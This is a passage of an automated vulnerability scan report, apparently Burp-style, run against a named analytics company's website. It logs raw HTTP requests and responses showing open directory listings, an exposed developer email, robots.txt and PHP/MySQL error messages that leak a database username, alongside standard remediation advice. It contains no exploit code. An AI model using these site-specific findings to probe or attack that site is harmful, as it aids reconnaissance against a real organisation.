GET /modules/mod_fpss/tmpl/JJ-Rasper/images/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/modules/mod_fpss/tmpl/JJ-Rasper/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:54:43 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 789 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /modules/mod_fpss/tmpl/JJ-Rasper/images</title> </head> <body> <h1>Index of /modules/mod_fpss/tmpl/JJ-Rasper/ ...[SNIP]... <li><a href="/modules/mod_fpss/tmpl/JJ-Rasper/"> Parent Directory</a> ...[SNIP]...
GET /modules/mod_fpss/tmpl/Movies/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/modules/mod_fpss/tmpl/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:55:02 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 543 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /modules/mod_fpss/tmpl/Movies</title> </head> <body> <h1>Index of /modules/mod_fpss/tmpl/Movies</h1> <ul><li><a href="/modules/mod_fpss/tmpl/"> Parent Directory</a> ...[SNIP]...
GET /modules/mod_fpss/tmpl/Movies/images/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/modules/mod_fpss/tmpl/Movies/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:55:32 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 816 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /modules/mod_fpss/tmpl/Movies/images</title> </head> <body> <h1>Index of /modules/mod_fpss/tmpl/Movies/images ...[SNIP]... <li><a href="/modules/mod_fpss/tmpl/Movies/"> Parent Directory</a> ...[SNIP]...
GET /modules/mod_fpss/tmpl/Sleek/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/modules/mod_fpss/tmpl/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:55:51 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 575 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /modules/mod_fpss/tmpl/Sleek</title> </head> <body> <h1>Index of /modules/mod_fpss/tmpl/Sleek</h1> <ul><li><a href="/modules/mod_fpss/tmpl/"> Parent Directory</a> ...[SNIP]...
GET /modules/mod_fpss/tmpl/Sleek/images/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/modules/mod_fpss/tmpl/Sleek/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:56:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 717 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /modules/mod_fpss/tmpl/Sleek/images</title> </head> <body> <h1>Index of /modules/mod_fpss/tmpl/Sleek/images</ ...[SNIP]... <li><a href="/modules/mod_fpss/tmpl/Sleek/"> Parent Directory</a> ...[SNIP]...
GET /modules/mod_fpss/tmpl/Sleek/psd/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/modules/mod_fpss/tmpl/Sleek/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:56:20 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 473 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /modules/mod_fpss/tmpl/Sleek/psd</title> </head> <body> <h1>Index of /modules/mod_fpss/tmpl/Sleek/psd</h1> <u ...[SNIP]... <li><a href="/modules/mod_fpss/tmpl/Sleek/"> Parent Directory</a> ...[SNIP]...
GET /modules/mod_fpss/tmpl/TT/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/modules/mod_fpss/tmpl/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:57:19 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 535 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /modules/mod_fpss/tmpl/TT</title> </head> <body> <h1>Index of /modules/mod_fpss/tmpl/TT</h1> <ul><li><a href="/modules/mod_fpss/tmpl/"> Parent Directory</a> ...[SNIP]...
GET /modules/mod_fpss/tmpl/TT/images/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/modules/mod_fpss/tmpl/TT/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:57:39 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 600 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /modules/mod_fpss/tmpl/TT/images</title> </head> <body> <h1>Index of /modules/mod_fpss/tmpl/TT/images</h1> <u ...[SNIP]... <li><a href="/modules/mod_fpss/tmpl/TT/"> Parent Directory</a> ...[SNIP]...
GET /modules/mod_fpss/tmpl/Uncut/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:51:32 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 541 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /modules/mod_fpss/tmpl/Uncut</title> </head> <body> <h1>Index of /modules/mod_fpss/tmpl/Uncut</h1> <ul><li><a href="/modules/mod_fpss/tmpl/"> Parent Directory</a> ...[SNIP]...
GET /modules/mod_fpss/tmpl/Uncut/images/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/modules/mod_fpss/tmpl/Uncut/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:51:40 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 651 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /modules/mod_fpss/tmpl/Uncut/images</title> </head> <body> <h1>Index of /modules/mod_fpss/tmpl/Uncut/images</ ...[SNIP]... <li><a href="/modules/mod_fpss/tmpl/Uncut/"> Parent Directory</a> ...[SNIP]...
GET /plugins/system/pc_includes/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:02:27 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 704 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /plugins/system/pc_includes</title> </head> <body> <h1>Index of /plugins/system/pc_includes</h1> <ul><li><a href="/plugins/system/"> Parent Directory</a> ...[SNIP]...
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:50:42 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 433 Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /templates/apros2.0/images/header</title> </head> <body> <h1>Index of /templates/apros2.0/images/header</h1>
GET /templates/apros2.0/js/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:50:40 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 852 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /templates/apros2.0/js</title> </head> <body> <h1>Index of /templates/apros2.0/js</h1> <ul><li><a href="/templates/apros2.0/"> Parent Directory</a> ...[SNIP]...
GET /templates/apros2.0/styles/elements/green/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:50:01 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 542 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /templates/apros2.0/styles/elements/green</title> </head> <body> <h1>Index of /templates/apros2.0/styles/elem ...[SNIP]... <li><a href="/templates/apros2.0/styles/elements/"> Parent Directory</a> ...[SNIP]...
GET /templates/apros2.0/styles/elements/green/images/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/templates/apros2.0/styles/elements/green/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:50:09 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Content-Length: 526 Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <html> <head> <title>Index of /templates/apros2.0/styles/elements/green/images</title> </head> <body> <h1>Index of /templates/apros2.0/styl ...[SNIP]... <li><a href="/templates/apros2.0/styles/elements/green/"> Parent Directory</a> ...[SNIP]...
The following email address was disclosed in the response:
contact@joomlaworks.gr
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).
Request
GET /modules/mod_fpss/mod_fpss.xml HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/modules/mod_fpss/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:00:34 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Last-Modified: Wed, 05 May 2010 00:24:45 GMT ETag: "24b91cb-2906-485cdda5a8d40" Accept-Ranges: bytes Content-Length: 10502 Connection: close Content-Type: application/xml
The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.
The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.
Issue remediation
The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.
Request
GET /robots.txt HTTP/1.0 Host: www.analyticspros.com
Response
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:33:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 Last-Modified: Wed, 14 Oct 2009 18:32:11 GMT ETag: "24b9eeb-130-475e9618860c0" Accept-Ranges: bytes Content-Length: 304 Connection: close Content-Type: text/plain
If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.
In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.
Issue remediation
For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.
GET /about/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:21:32 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
GET /blog.html. HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/55-googleanalytics/117-campaign-tracking-with-google-analytics-email-banners-and-more.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 08:21:56 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
